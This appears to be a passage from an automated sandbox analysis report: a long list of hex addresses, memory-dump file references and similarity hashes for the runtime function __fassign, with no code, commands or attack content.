                                                                                                                                                  0x00c8fe2f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fe2f
                                                                                                                                                  0x00cbed08
                                                                                                                                                  0x00cbed0f
                                                                                                                                                  0x00cbed17
                                                                                                                                                  0x00cbed1b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbed1b
                                                                                                                                                  0x00c8fd88
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fd94
                                                                                                                                                  0x00c8fd99
                                                                                                                                                  0x00c8fda1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fdb0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fdb0
                                                                                                                                                  0x00cbecbd
                                                                                                                                                  0x00c8fdc7
                                                                                                                                                  0x00c8fdcb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fdd7
                                                                                                                                                  0x00c8fde3
                                                                                                                                                  0x00c8fe06
                                                                                                                                                  0x00ca1fe7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca1fef
                                                                                                                                                  0x00ca1ff0
                                                                                                                                                  0x00ca1ff4
                                                                                                                                                  0x00ca1ff7
                                                                                                                                                  0x00ca1ffa
                                                                                                                                                  0x00ca1ffd
                                                                                                                                                  0x00ca2000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbecf1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbecf1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fe06
                                                                                                                                                  0x00c8fde8
                                                                                                                                                  0x00c8fdec
                                                                                                                                                  0x00c8fdef
                                                                                                                                                  0x00c8fdf2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fdf2
                                                                                                                                                  0x00c8fdcb
                                                                                                                                                  0x00c8fd04
                                                                                                                                                  0x00c8fd05
                                                                                                                                                  0x00cbec67
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbec6f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbec6f
                                                                                                                                                  0x00c8fd13
                                                                                                                                                  0x00c8fd3c
                                                                                                                                                  0x00c8fd40
                                                                                                                                                  0x00cbec75
                                                                                                                                                  0x00cbec7a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbec8a
                                                                                                                                                  0x00cbec8a
                                                                                                                                                  0x00cbec90
                                                                                                                                                  0x00cbecb2
                                                                                                                                                  0x00c8fd73
                                                                                                                                                  0x00c8fd73
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fd73
                                                                                                                                                  0x00cbec95
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeca1
                                                                                                                                                  0x00cbeca4
                                                                                                                                                  0x00cbeca5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbeca5
                                                                                                                                                  0x00cbec7a
                                                                                                                                                  0x00c8fd4a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fd6e
                                                                                                                                                  0x00c8fd6e
                                                                                                                                                  0x00c8fd71
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fd71
                                                                                                                                                  0x00c8fd4a
                                                                                                                                                  0x00c8fd21
                                                                                                                                                  0x00c9a3a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c9a3a1
                                                                                                                                                  0x00c8fd36
                                                                                                                                                  0x00ca200b
                                                                                                                                                  0x00ca2012
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca2018
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00ca2018
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c8fd36
                                                                                                                                                  0x00c8fe0f
                                                                                                                                                  0x00c8fe16
                                                                                                                                                  0x00c9a3ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00c9a3b3
                                                                                                                                                  0x00c9a3b3
                                                                                                                                                  0x00c8fe1f
                                                                                                                                                  0x00cbed25
                                                                                                                                                  0x00cbed86
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbed91
                                                                                                                                                  0x00cbed95
                                                                                                                                                  0x00cbed95
                                                                                                                                                  0x00cbed9a
                                                                                                                                                  0x00cbedad
                                                                                                                                                  0x00cbedb3
                                                                                                                                                  0x00cbedba
                                                                                                                                                  0x00cbedc4
                                                                                                                                                  0x00cbedc9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbedcc
                                                                                                                                                  0x00cbed2a
                                                                                                                                                  0x00cbed55
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbed61
                                                                                                                                                  0x00cbed66
                                                                                                                                                  0x00cbed6e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbed7d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbed7d
                                                                                                                                                  0x00cbed30
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00cbed3c
                                                                                                                                                  0x00cbed43
                                                                                                                                                  0x00cbed4b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fassign
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3965848254-0
                                                                                                                                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                  • Instruction ID: c0b15506f3bd10d7c3d76e74021a868cd45a10dce14495575b107c8aebc02e5d
                                                                                                                                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                  • Instruction Fuzzy Hash: 62917F31D0020AEBDF24EFA9C8456EEB7B4FF95308F24807ED411A6162E7705B42DB99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%